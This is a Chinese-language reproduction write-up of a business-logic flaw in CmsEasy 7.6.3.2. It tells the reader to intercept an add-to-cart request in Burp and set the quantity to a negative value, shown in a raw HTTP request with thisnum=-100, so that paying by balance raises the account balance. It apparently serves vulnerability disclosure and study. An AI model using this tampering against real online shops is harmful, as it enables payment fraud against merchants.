menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 025-CmsEasy chevron_right 004-CmsEasy 7.6.3.2_20200422 逻辑漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    004-CmsEasy 7.6.3.2_20200422 逻辑漏洞.md
    1.7 KB / 2021-07-17 00:01:24
        # CmsEasy 7.6.3.2_20200422 逻辑漏洞
    
    ### 一、漏洞简介
    
    ### 二、漏洞影响
    
    CmsEasy 7.6.3.2
    
    ### 三、复现过程
    
    1.登录任意账号
    
    2.点击任意产品
    
    ![](images/15897266217910.png)
    
    
    2.点击任意产品
    
    ![](images/15897266288524.png)
    
    
    3.点开任意一个产品,前提是有余量
    
    ![](images/15897266373411.png)
    
    
    4.输入任意正常数量,burp开启抓包,点击添加到购物车
    
    ![](images/15897266443393.png)
    
    
    5.将抓到的包中的最后一个数字改为负数
    
    ![](images/15897266510134.png)
    
    
    ![](images/15897266550107.png)
    
    
    然后放包
    
    
    ```bash
    GET /index.php?case=archive&act=doorders&aid=527&datatype=&thisnum=-100 HTTP/1.1
    Host: www.baidu.com
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0
    Referer: http://localhost/index.php?case=archive&act=show&aid=527
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=5j671r8cg9kfppbkpl7i0n1te0; loginfalse=0; login_username=admin; login_password=787cc8f99d30dc9cbeeadd77f99efb84; ce_orders_cookie=TL%2BA8RODL9PeNwoN
    Connection: close
    ```
    
    6.此时可以看到购物车中为负数
    
    ![](images/15897266764936.png)
    
    
    7.查看个人中心中的余额,为5600
    
    ![](images/15897266843734.png)
    
    
    8.点击购物车
    
    ![](images/15897266914212.png)
    
    
    9.点击下图内容
    
    ![](images/15897266982500.png)
    
    
    10.填写完成之后,点击在线支付
    
    ![](images/15897267061230.png)
    
    
    11.选择余额支付,点击购买
    
    ![](images/15897267130666.png)
    
    
    12.购买成功
    
    ![](images/15897267195006.png)
    
    
    13.回到个人中心,可以看到余额的变化
    
    ![](images/15897267281648.png)
    
    
    links
    file_download